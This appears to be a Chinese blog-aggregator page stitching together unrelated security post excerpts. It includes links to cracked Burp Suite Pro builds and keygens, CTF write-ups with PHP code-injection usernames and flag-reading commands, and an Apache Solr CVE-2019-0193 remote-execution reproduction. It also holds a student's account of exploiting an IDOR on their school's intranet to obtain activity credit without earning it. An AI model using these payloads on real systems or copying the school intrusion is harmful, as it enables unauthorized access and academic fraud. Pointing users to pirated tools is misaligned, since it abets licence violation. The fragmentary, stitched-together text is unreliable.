Burp

白话burp suite渗透测试利器的英文(入门版)

不想你离开。 提交于 2021-02-20 07:39:05
技术博客的可读性非常重要,这也是技术博客写作的重要原则。 电脑系统是kali linux2018.1版本,64位 burpsuite_pro_v1.7.11破解版(含下载) 链接:http://www.freebuf.com/sectool/121992.html 虽然我很支持使用正版,但是如果有破解版可以尝试入门,实在是太好了。 除了这个连接,还有独自等待博客 BurpSuitePro v1.7.31及注册机下载 链接:https://www.waitalone.cn/burpsuite1731-keygen.html BurpSuitePro v1.7.32及注册机下载 链接:https://www.waitalone.cn/burpsuite-v1732.html 我想这些完全足够使用了。 我用的是第一个下载源,下载解压,编写脚本命名为burp.sh,脚本所在文件夹启动脚本即可sh burp.sh,默认安装就好。 #!/bin/bash java -jar /root/burpsuite/BurpHelper.jar 这里不说如何使用,因为这个工具的使用是有很多可以研究的。这里想说说上面的英语单词的意思,因为这个是全英文版的。 burp suite官方网站:https://portswigger.net/burp/,社区免费版,专业版两种可以选择,后者是每年每人349美元。

CTF实验吧让我进去writeup

余生颓废 提交于 2021-02-15 06:39:37
初探题目 <!-- more --> 两个表单,我们用burp抓包试试 这时候我们发现Cookie值里有个很奇怪的值是source,这个单词有起源的意思,我们就可以猜测这个是判断权限的依据,让我们来修改其值为1,发送得到如下显示: 代码审计 发现爆出了源代码,让我们来审计一下 $flag = "XXXXXXXXXXXXXXXXXXXXXXX"; $secret = "XXXXXXXXXXXXXXX"; // This secret is 15 characters long for security! $username = $_POST["username"]; $password = $_POST["password"]; if (!empty($_COOKIE["getmein"])) { if (urldecode($username) === "admin" && urldecode($password) != "admin") { if ($COOKIE["getmein"] === md5($secret . urldecode($username . $password))) { echo "Congratulations! You are a registered user.\n"; die ("The flag is ". $flag); } else {

CVE-2019-0193:Apache Solr远程命令执行漏洞复现

烂漫一生 提交于 2021-02-04 09:52:00
0x00 漏洞背景 2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重 0x01 影响范围 Apache Solr < 8.2.0 0x02 环境搭建 下载地址: https://www.apache.org/dyn/closer.lua/lucene/solr/7.7.2/solr-7.7.2.zip 在本地解压,进入solr-7.7.2目录,执行命令 bin/solr -e dih (前提:java环境) 然后访问 http://localhost:8983/solr 即可访问环境 0x03 漏洞利用 首先我们可以通过接口 curl http://127.0.0.1:8983/solr/admin/cores 来获取所有 core 信息,下面我们构造 payload 需要 name 信息 在Burp中发送以下POC即可执行命令弹出计算器,下面的<your_core_name> 需要替换为你获取到的 core 的 name(共两处) POST /solr/<your_core_name>/dataimport HTTP/1.1 Host : 127.0.0.1:8983 Content-Length : 763 User-Agent : Mozilla/5.0 Content-type : application/x-www

“百度杯”CTF比赛 2017 二月场_onthink

柔情痞子 提交于 2021-01-30 11:57:08
题目在i春秋ctf训练营中能找到,这题直接拿大佬的wp来充数 百度找到onethinnk的一个漏洞。 参考: http://www.hackdig.com/06/hack-36510.htm 就是注册个账号为: %250a%24a%3d%24_GET%5ba%5d%3b%2f%2f%250aecho+%60%24a%60%3b%2f%2f的账号, 但因为账号长度有限制。所以分别两个来注册 账号一:%0a$a=$_GET[a];// 账号二:%0aecho `$a`;// 用burp来改包,不然会失败。 依次登入,也要用burp来改包登入。 然后访问/Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php 查找下flag位置 cat就行了。 /Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php?a=cat ../../flag.php 前面几步照着wp来完全没毛病,直到最后一步的时候卡住了 于是开始自己尝试 首先确定了该文件夹其他文件 试着去打开其他文件,发现别的文件都可以cat,只有flag.php不行,猜测这个文件设置了权限 不让我读还能不让我复制啊咋地,执行一下复制命令试试 回到刚才的目录下面一瞅 成功的复制过来了,直接访问flag.txt就能看到flag啦 来源: oschina 链接

How make android application Proxy Aware (Programmatically)?

陌路散爱 提交于 2021-01-24 07:42:49
问题 When I use any proxy like Burp or Owasp ZAP, I see that many applications follow the proxy path and some doesn't and they just flow data directly. I want to know what code is used for this, so that I can choose my own application to be proxy aware or not. 来源: https://stackoverflow.com/questions/60126563/how-make-android-application-proxy-aware-programmatically

校园内网web平台的渗透测试(上)无限加分?

别说谁变了你拦得住时间么 提交于 2021-01-19 16:00:48
前景介绍:最近学校开放了内网平台,这个平台主要做的就是一些校园日常管理,例如学生的违纪,获奖,第二课堂分数,校园活动抢选等等。。每学期第二课堂分数要到16分才能及格,不然挂科凉凉…至于第二课堂分数怎么得,就是参加一些课外活动会给一个验证码,然后在自己账号输入这个验证码即可加分!! 毕竟我太懒了,这一天代码都敲不完还去参加课外活动?看看能不能想办法白嫖一下说淦就淦 首先进行了一波信息搜集 以下这几个开放的端口均开放着web服务,以下四个站点都是弱口令 http://172.x.0.233:9099/XXXXL/ http://172.x.0.233:9091/PXXXXXT/ http://172.x.0.233:9090/BXXXT/ http://172.x.0.233:9080/DXXT/login.html 因为这几个站都是一些学校社团发布文章的站点,我就没有细看 直接看学生管理平台,这个就是加分的平台~ 然后直接发现了活动兑换码可进行越权下载 审查元素看了一下,发现每个活动都有一个属于自己的ID号,进行加密了,刚开始以为是Md5加密,解了一下 发现不是md5加密。 经过前期信息搜集发现一个下载的链接 http://172.xxxxx233//syt/hdsb/downloadcode.htm?id=活动ID号 上面这个链接本应该是只能管理员才能进行访问进行下载东西的

BurpSuite插件开发指南之 API 下篇

风流意气都作罢 提交于 2021-01-13 18:44:24
0x00 前言 此文是接着 《BurpSuite插件开发指南之 API 上篇》 所写,此篇中将要介绍的 API 和上篇有着紧密的联系,所以建议读者可以将上下篇作为一个整体去看待。 《BurpSuite 插件开发指南》系列文章如下: 《BurpSuite插件开发指南之 API 篇》 《BurpSuite插件开发指南之 Java 篇》 《BurpSuite插件开发指南之 Python 篇》 0x01 API 参考 IMessageEditor public interface IMessageEditor 此接口被用于使用 Burp 的 HTTP 消息编辑框的实例提供扩展功能,以便扩展插件可以在它自己的 UI 中使用消息编辑框,扩展插件可以通过调用 IBurpExtenderCallbacks.createMessageEditor() 获得此接口的实例。 此接口提供了以下方法: #!java // 此方法返回了编辑器的 UI 组件,扩展插件可以将其添加到自己的 UI 中 java.awt. Component getComponent ( ) // 此方法用于获取当前已显示的消息,此消息可能已被用户修改 byte [] getMessage ( ) // 此方法返回了用户当前所选择的数据 byte [] getSelectedData ( ) //

BurpSuite插件开发指南之 Python 篇

梦想与她 提交于 2021-01-13 18:37:01
此文接着 《BurpSuite插件开发指南之 Java 篇》 。在此篇中将会介绍如何使用 Python编程语言 开发 BurpSuite 的插件。 《BurpSuite 插件开发指南》系列文章如下: 《BurpSuite插件开发指南之 API 篇》 《BurpSuite插件开发指南之 Java 篇》 《BurpSuite插件开发指南之 Python 篇》 注:此系列文章是笔者利用业余时间所写,如有错误,望读者们及时指正,另外此系列文章属于入门级别的科普文,目的是普及Burp插件的编写技术。 0x00 Jython 简介 BurpSuite 是使用 Java 编程语言编写的,所以想要使用 Python 编程语言开发其插件,就必须借助于 Jython。Jython 本质上是一个 Java 应用程序,它允许 coder 们使用 Java 代码调用 Python 库反之,也可以使用 Python 调用 Java 的库。 有关 Jython 的详细使用,请读者参阅 Jython 官网的用户手册 和 相关 doc。 类似于 Jython 的 Project 还有 JRuby ,并且 Burp 也支持 ruby 编写插件,但是无论是用 Python 还是 Ruby 编写的插件,在执行效率方面远远不如原生的 Java 高,所以笔者还是建议使用 Java 编写插件。 0x01 Python 编写

渗透测试公司之实战SQL注入拿下网站权限

删除回忆录丶 提交于 2020-12-08 16:55:33
近来,利用sql注入、xss和文件上传漏洞,成功getshell的一个客户网站(必须要拿到客户授权渗透测试许可证明才可以,不得违法入侵),这里简单记录一下整个过程,与大家分享。收集信息,查找漏洞。第一步就是进行信息收集,经过一轮的收集,发现这个网站租的是香港的服务器,没有waf文件;从网站的界面看,这个网站是用cms搭建的,搭建的环境是Iis10.0+php,同时通过目录扫描工具发现了一些网站的目录,但没有找到后台登录地址(这肯定是网站管理员隐藏了后台的地址)。 然后,寻找漏洞,个人一般都是从寻找带有XSS漏洞的sql注入开始,打开网站,burp打开,进入XSS漏洞平台,打开寻找漏洞的途径。第一步是将XSS平台生成的XSS代码,在有输入的地方粘贴,然后集中精力寻找sql注入漏洞(对于不带waf的站点,存在SQL注入)在通过burp之后,就可以开始浏览网页,找出可能存在sql注入的任何地方,只要有project,就可以尝试一下。再经过一测试,发现经常出现sql注入漏洞的登录界面,登录界面都没有sql注入过。太难!!然后继续查找,最后发现存在sql注入的地方。 然后使用burp抓包,把包放进sqlmap中运行,确实存在SQL注入。借助漏洞,顺利拿到了网站所有的表名,也拿到了管理员的账号密码,运气也不错,居然把管理密码给解了(估计这个网站用的是某个老CMS)。下一步需要找到后台地址

IoT产品渗透系列(二):LAN下的流量代理抓包

为君一笑 提交于 2020-12-02 15:19:22
近日在工作中遇到了要对IoT产品进行渗透测试,我将会进行一系列的更新,将工作中遇到的问题以及解决的经验分享在CSDN,喜欢的小伙伴请点赞关注。 以太网下的流量代理监控 这个测试适用于在wifi网络或者以太网网络下的流量代理设置指导.在无线网络热点创建之后,在Kali测试环境中配置防火墙转发规则,将无线网络的特定访问流量重定向到BurpSuite中。 其具体的框架图如下所示: 第一步:创建无线热点, 请参考作者文章IoT产品渗透系列(一)《Kali是如何创建热点》 第二步: 在Kali测试环境中增加对指定目标的流量转发,例如将通过无线热点的访问HTTP的流量重定位到本机Burpsuite代理软件的80端口。可使用如下命令 $iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j DNAT --to-destination burpip:burp_http_port 注意: -i 选项指向无线热点的网卡名字, burpip:为开启burpsuit软件的主机IP, burp_http_port为Burpsuite软件监听的端口. 举栗子: Kali测试环境中无线网卡的名字为wlan0 (可通过Ifconfig查询)。被测设备通过此wlan0创建的热点联网与远端服务器进行通讯,远端服务器的端口为80